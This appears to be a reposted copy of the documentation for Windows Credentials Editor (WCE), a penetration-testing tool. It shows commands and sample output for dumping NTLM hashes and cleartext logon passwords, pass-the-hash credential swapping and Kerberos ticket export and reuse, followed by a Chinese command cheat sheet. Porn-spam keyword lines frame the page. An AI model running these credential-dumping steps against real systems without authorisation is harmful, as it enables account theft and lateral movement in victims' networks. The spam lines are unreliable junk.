a级美女视频,杨幂酒店视频

WCE 一個不錯的HASH注入工具可讀明文密碼

2015.01.29

Windows Credentials Editor (WCE)

Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) - WCE v1.3beta (64-bit) (download)
Old Versions (x32): WCE v1.2 (download), WCE v1.1 (download), WCE v1.0 (download)
Old Versions (x64): WCE v1.21 (download), WCE v1.2 (download)

--------

Windows Credentials Editor provides the following options:

Options:

-l List logon sessions and NTLM credentials (default).

-s Changes NTLM credentials of current logon session.

Parameters: :::.

-r Lists logon sessions and NTLM credentials indefinitely.

Refreshes every 5 seconds if new sessions are found.

Optional: -r.

-c Run in a new session with the specified NTLM credentials.

Parameters: .

-e Lists logon sessions NTLM credentials indefinitely.

Refreshes every time a logon event occurs.

-o saves all output to a file.

Parameters: .

-i Specify LUID instead of use current logon session.

Parameters: .

-d Delete NTLM credentials from logon session.

Parameters: .

-a Use Addresses.

Parameters:

-f Force 'safe mode'.

-g Generate LM & NT Hash.

Parameters: .

-K Dump Kerberos tickets to file (unix & 'windows wce' form

at)

-k Read Kerberos tickets from file and insert into Windows

cache

-w Dump cleartext passwords stored by the digest authentication package

-v verbose output.

Examples:

* List current logon sessions

C:\>wce -l

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

C:\>wce -l -v

Current Logon Session LUID: 00064081h

Logon Sessions Found: 8

WIN-REK2HG6EBIS\auser:NTLM

LUID:0006409Fh

WIN-REK2HG6EBIS\auser:NTLM

LUID:00064081h

NT AUTHORITY\ANONYMOUS LOGON:NTLM

LUID:00019137h

NT AUTHORITY\IUSR:Negotiate

LUID:000003E3h

NT AUTHORITY\LOCAL SERVICE:Negotiate

LUID:000003E5h

WORKGROUP\WIN-REK2HG6EBIS$:Negotiate

LUID:000003E4h

\:NTLM

LUID:0000916Ah

WORKGROUP\WIN-REK2HG6EBIS$:NTLM

LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999

Changing NTLM credentials of current logon session (00064081h) to:

Username: auser

domain: admin

LMHash: 99999999999999999999999999999999

NTHash: 99999999999999999999999999999999

NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999

Changing NTLM credentials of logon session 000003E5h to:

Username: auser

domain: admin

LMHash: 99999999999999999999999999999999

NTHash: 99999999999999999999999999999999

NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5

NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.

Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions

Refresh is every 5 seconds by default.

C:\>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:\>wce -r5

* Generate LM & NT Hash.

C:\>wce -g test

Password: test

Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & 'windows wce' format)

C:\>wce -K

Converting and saving TGT in UNIX format to file wce_ccache...

Converting and saving tickets in Windows WCE Format to file wce_krbtkts..

5 kerberos tickets saved to file 'wce_ccache'.

5 kerberos tickets saved to file 'wce_krbtkts'.

Done!

* Read Kerberos tickets from file and insert into Windows cache

C:\>wce -k

Reading kerberos tickets from file 'wce_krbtkts'...

5 kerberos tickets were added to the cache.

Done!

* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w

test\MYDOMAIN:mypass1234

NETWORK SERVICE\WORKGROUP:test

GETLSASRVADDR.EXE

-----------------

This tool can be used to obtain automatically needed addresses for WCE

to be able to read logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the

"Debugging Tools for Windows" package.

Additional Information

----------------------

* http://www.ampliasecurity.com/research.html

* http://www.ampliasecurity.com/research/wcefaq.html

* http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf

* http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

整理下常用的命令

【list NTLM credentials in memory】

wce.exe

wce.exe -o output.txt

【dump logon cleartext passwords】

wce.exe -w

【change my current NTLM credentials】

wce.exe -s :::

【create a new logon session and launch a program with new NTLM credentials】

wce.exe -s ::: -c

【generate NTLM hashes】

wce.exe -g

【Safe mode No injection】

wce.exe -f

本站僅提供存儲服務，所有內容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權內容，請點擊舉報。

打開APP，閱讀全文并永久保存查看更多類似文章

How Interactive Logon Works

NTLM 身份驗證

Exchange 網(wǎng)絡端口參考

国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看